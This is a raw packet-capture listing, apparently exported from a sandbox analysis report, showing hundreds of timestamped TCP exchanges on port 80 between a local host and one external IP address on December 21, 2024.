                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.455295086 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.455344915 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.456348896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.456401110 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.456468105 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.456515074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.457536936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.457586050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.457675934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.457721949 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.458714008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.458765984 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.458844900 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.458889961 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.459844112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.459894896 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.459975004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.460022926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.461000919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.461049080 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.461113930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.461158991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.462157965 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.462203979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.462259054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.462302923 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.463329077 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.463376999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.463449955 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.463637114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.464499950 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.464545965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.464622974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.464668989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.465719938 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.465764999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.465773106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.465836048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.466871977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.466917992 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.466986895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.467030048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.467988014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.468039989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.468112946 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.468159914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.469149113 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.469197035 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.469293118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.469345093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.470329046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.470376015 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.470446110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.470494032 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.471492052 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.471539021 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.471638918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.471687078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.472651005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.472700119 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.472779989 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.472826004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.473814011 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.473875999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.473969936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.474016905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.474966049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.475008965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.475085974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.475128889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.476146936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.476192951 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.476237059 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.476296902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.477293968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.477339029 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.477391958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.477437019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.478467941 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.478519917 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.478519917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.478576899 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.479643106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.479691982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.479754925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.479799986 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.480807066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.480868101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.480881929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.480930090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.481945038 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.481997013 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.482081890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.482131958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.483122110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.483175993 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.483266115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.483320951 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.484291077 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.484339952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.484618902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.484663010 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.485449076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.485498905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.485574007 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.485620975 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.486685991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.486736059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.486757040 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.486814022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.487771988 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.487823009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.487903118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.487945080 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.488965034 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.489011049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.489089966 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.489135027 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.490113020 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.490160942 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.490226030 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.490267038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.491269112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.491324902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.491360903 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.491409063 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.492419004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.492470026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.492564917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.492615938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.493633032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.493680000 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.493788958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.493835926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.494780064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.494826078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.494831085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.494879007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.495943069 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.495995045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.496040106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.496088028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.497100115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.497152090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.497227907 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.497275114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.498258114 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.498311043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.498460054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.498507977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.499433041 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.499483109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.499603033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.499650002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.500581026 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.500629902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.500709057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.500757933 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.501749992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.501801014 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.501862049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.501912117 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.502985001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.503036022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.503103971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.503153086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.504087925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.504137039 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.504216909 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.504270077 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.505239964 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.505291939 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.505356073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.505405903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.506432056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.506481886 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.506546974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.506601095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.507589102 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.507637024 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.507703066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.507750988 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.508851051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.508899927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.508963108 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.509008884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.509955883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.510004997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.510068893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.510121107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.511070013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.511121035 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.511185884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.511234045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.512236118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.512284040 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676368952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676434040 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676461935 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676479101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676609993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676666021 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676729918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.676781893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.677814960 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.677869081 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.677966118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.678014994 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.678961039 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.679012060 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.679074049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.679121971 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.680123091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.680167913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.680476904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.681288958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.681343079 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.681627035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.682490110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.682526112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.682542086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.683614969 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.683666945 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.683722019 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.683773041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.684770107 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.684956074 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.685007095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.685925007 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.686065912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.686121941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.687099934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.687150955 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.687213898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.688277006 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.688327074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.688393116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.689420938 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.689472914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.689559937 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.689614058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.690617085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.690710068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.690762043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.691775084 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.691895962 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.691950083 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.692960978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.693061113 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.693114996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.694082975 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.694222927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.694276094 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.695247889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.695292950 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.695372105 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.696441889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.696448088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.696496964 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.696594000 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.696640968 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.697568893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.697618008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.697685957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.697730064 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.698751926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:15.698802948 CET4982880192.168.2.531.41.244.11
